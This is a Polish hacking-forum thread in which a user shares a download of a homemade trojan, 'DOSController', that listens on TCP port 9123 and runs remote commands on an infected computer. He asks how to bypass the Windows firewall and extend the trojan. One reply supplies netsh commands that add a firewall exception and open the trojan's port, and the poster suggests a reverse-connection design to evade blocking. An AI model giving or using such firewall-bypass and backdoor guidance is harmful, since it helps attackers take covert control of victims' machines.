DOSController

krzysiek2222

Użytkownik
Dołączył
Styczeń 19, 2008
Posty
5
DOSController v1.0
Program pracuje na porcie 9123. Używa protokołu TCP. W reakcji na odebranie danych uruchamia polecenia wiersza poleceń. Wystarczy wysłać na port 9123 zainfekowanego komputera polecenie. Program powstał w Borlandzie C++ 6. Czy zna ktoś sposób na ominięcie firewalla(np. jak dodać do wyjątków zapory Windows)?
Download .
W archiwum znajdują się pozostałe pliki (forma, projekt itp).
Ma ktoś sugestie jak rozszerzyć tego trojana?
PS. Użytkownik kożysta z programu na własną odpowiedzialność!!!!!!!!!!!!!!!!!!!!
 

bialkomat

Użytkownik
Dołączył
Listopad 14, 2005
Posty
14
Originally posted by krzysiek2222
Czy zna ktoś sposób na ominięcie firewalla(np. jak dodać do wyjątków zapory Windows)?

Ja znam jedynie sposób dosowymi poleceniami, np.:

Kod:
netsh firewall add allowedprogram "C:program filesjakisprogramjakisprogram.exe" jakisprogram enable



netsh firewall add portopening TCP 9123 program ENABLE ALL
 

h4x

Użytkownik
Dołączył
Styczeń 6, 2008
Posty
107
kiedys, dawno temu ludzie pisali w miare dobre trojany. Z czasem poziom sie obnizal, a dzis ciezko znalezc cos co nie wymaga frameworka. 90% tego softu NIE DZIALA. A dlaczego? Bo sa coraz prostsze i gorsze toolsy.
I nie bede szukal bibliotek, ofierze tez kazesz szukac vcl60.bpl :yes: ?
 

rafal

Były Moderator
Dołączył
Marzec 30, 2005
Posty
392
kazdy chce sprobowac napisac cosik wg. poradnika , tylko po co odrazu wrzucac ten "wyczyn" na forum
 

krzysiek2222

Użytkownik
Dołączył
Styczeń 19, 2008
Posty
5
Ale ustawiłem w głupim borlandzie żeby kożystał z Windowsowych dll, ale oczywiście znowu się przestawił. Już poprawione.
PS. Ten sposób na ominięcie firewalla nic nie dał. Nadal jest bolkowany. Chodzi mi o tego Windwosowego firewalla. A pozatym sposobem jest napisanie jako trojana klient a nie serwera.
 
Do góry Bottom